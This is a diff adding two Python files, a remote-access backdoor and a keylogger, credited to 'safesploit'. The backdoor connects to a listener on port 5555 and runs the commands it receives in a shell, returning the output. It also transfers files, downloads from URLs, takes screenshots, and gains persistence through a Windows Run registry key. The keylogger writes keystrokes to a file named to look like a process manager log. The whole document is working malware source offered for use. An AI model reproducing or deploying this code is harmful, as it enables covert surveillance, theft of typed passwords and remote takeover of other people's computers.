Backdoor and keylogger files

Author: safesploit

backdoor/backdoor.py

@@ -0,0 +1,155 @@
+import socket
+import json
+import subprocess
+import time
+import os
+import pyautogui    #dependency # pip install pyautogui #mss is faster alternative
+import keylogger
+import threading
+import shutil
+import sys
+import requests
+from sys import platform
+
+def reliable_send(data):
+    jsondata = json.dumps(data)
+    s.send(jsondata.encode())
+
+def reliable_recv():
+    data = ''
+    while True:
+        try:
+            data = data + s.recv(1024).decode().rstrip()
+            return json.loads(data)
+        except ValueError:
+            continue
+
+def download_file(file_name):
+    f = open(file_name, 'wb')
+    s.settimeout(2)
+    chunk = s.recv(1024)
+    while chunk:
+        f.write(chunk)
+        try:
+            chunk = s.recv(1024)
+        except socket.timeout as e:
+            break
+    s.settimeout(None)
+    f.close()
+
+def upload_file(file_name):
+    f = open(file_name, 'rb')
+    s.send(f.read())
+
+def download_url(url):
+    get_response = requests.get(url)
+    file_name = url.split('/')[-1]
+    with open(file_name, 'wb') as out_file:
+        out_file.write(get_response.content)
+
+def screenshot():
+    myScreenshot = pyautogui.screenshot()
+    myScreenshot.save('.screen.png')
+
+def persist(reg_name, copy_name):
+    file_location = os.environ['appdata'] + '\\' + copy_name
+    try:
+        if not os.path.exists(file_location):
+            shutil.copyfile(sys.executable, file_location)
+            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
+            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
+        else:
+            reliable_send('[+] Persistence Already Exists')
+    except:
+        reliable_send('[-] Error Creating Persistence With The Target Machine')
+
+def is_admin():
+    global admin
+    if platform == 'win32':
+        try:
+            temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\windows'), 'temp']))
+        except:
+            admin = '[!!] User Privileges!'
+        else:
+            admin = '[+] Administrator Privileges!'
+    elif platform == "linux" or platform == "linux2" or platform == "darwin": 
+        pass
+        #TO BE DONE
+
+def shell():
+    while True:
+        command = reliable_recv()
+        if command == 'quit':
+            break
+        elif command == 'background':   #BEGIN
+            pass
+        elif command == 'help':         #ideally to be removed
+            pass
+        elif command == 'clear':
+            pass                        #END
+        elif command[:3] == 'cd ':
+            os.chdir(command[3:])
+        elif command[:6] == 'upload':
+            download_file(command[7:])
+        elif command[:8] == 'download':
+            upload_file(command[9:])
+        elif command[:3] == 'get': 
+            try:
+                download_url(command[4:])
+                reliable_send('[+] Downloaded File From Specified URL!')
+            except:
+                reliable_send('[!!] Download Failed!')
+        elif command[:10] == 'screenshot':
+            screenshot()
+            upload_file('.screen.png')
+            os.remove('.screen.png')
+        elif command[:12] == 'keylog_start':
+            keylog = keylogger.Keylogger()
+            t = threading.Thread(target=keylog.start)
+            t.start()
+            reliable_send('[+] Keylogger Started!')
+        elif command[:11] == 'keylog_dump':
+            logs = keylog.read_logs()
+            reliable_send(logs)
+        elif command[:11] == 'keylog_stop':
+            keylog.self_destruct()
+            t.join()
+            reliable_send('[+] Keylogger Stopped!')
+        elif command[:11] == 'persistence':
+            reg_name, copy_name = command[12:].split(' ')
+            persist(reg_name, copy_name)
+        elif command[:7] == 'sendall':
+            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+        elif command[:5] == 'check':
+            try:
+                is_admin()
+                reliable_send(admin + ' platform: ' + platform)
+            except:
+                reliable_send('Cannot Perform Privilege Check! Platform: ' + platform)
+        elif command[:5] == 'start':
+            try:
+                subprocess.Popen(command[6:], shell=True)
+                reliable_send('[+] Started!')
+            except:
+                reliable_send('[-] Failed to start!')
+        else:
+            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
+            result = execute.stdout.read() + execute.stderr.read()
+            result = result.decode()
+            reliable_send(result)
+
+def connection():
+    while True:
+        time.sleep(5)
+        try:
+            s.connect(('127.0.0.1', 5555))
+            # if platform == 'win32':       #TO BE DONE
+            #     persist(reg_name, copy_name)
+            shell()
+            s.close()
+            break
+        except:
+            connection()
+            
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connection()

backdoor/keylogger.py

@@ -0,0 +1,77 @@
+#Possibly requires Python3.7
+import os
+from pynput.keyboard import Listener #Dependency # pip install listener
+import time
+import threading
+from sys import platform
+
+class Keylogger():
+    keys = []
+    count = 0
+    flag = 0
+    if platform == 'win32':
+        path = os.environ['appdata'] +'\\processmanager.txt' 
+        #Windows path #cmd.exe> type AppData\Roaming\processmanager.txt 
+        #(Windows also supports >more command)
+    elif platform == "linux" or platform == "linux2" or platform == "darwin": 
+        path = 'processmanager.txt'
+
+    def on_press(self, key):
+        self.keys.append(key)
+        self.count += 1
+
+        if self.count >= 1:
+            self.count = 0
+            self.write_file(self.keys)
+            self.keys = []
+
+    def read_logs(self):
+        with open(self.path, 'rt') as f:
+            return f.read()
+
+    def write_file(self, keys):
+        with open(self.path, 'a') as f:
+            for key in keys:
+                k = str(key).replace("'", "")
+                if k.find('backspace') > 0:
+                    f.write(' [BACKSPACE] ')
+                elif k.find('enter') > 0:
+                    f.write('\n')
+                # elif k.find('control') > 0:   #doesn't currently work
+                #     f.write(' [CTRL] ')
+                elif k.find('shift') > 0:
+                    f.write(' [SHIFT] ')
+                elif k.find('space') > 0:
+                    f.write(' ')
+                elif k.find('caps_lock') > 0:
+                    f.write(' [CAPS_LOCK] ')
+                elif k.find('Key'):
+                    f.write(k)
+
+    def self_destruct(self):
+        self.flag = 1
+        listener.stop()
+        #self.overwrite_file(self.path)
+        os.remove(self.path)
+
+    def overwrite_file(self):
+        print('keylog file path: ' + self.path) #to test this is calling correctly
+        with open(self.path, 'w') as f:
+            f.write('\n')
+        #This section should overwrite the keylog file
+
+    def start(self):
+        global listener
+        with Listener(on_press=self.on_press) as listener:
+            listener.join()
+
+if __name__ == '__main__':
+    keylog = Keylogger()
+    t = threading.Thread(target=keylog.start)
+    t.start()
+    while keylog.flag != 1:
+        time.sleep(10)
+        logs = keylog.read_logs()
+        print(logs)
+        #keylog.self_destruct()
+    t.join()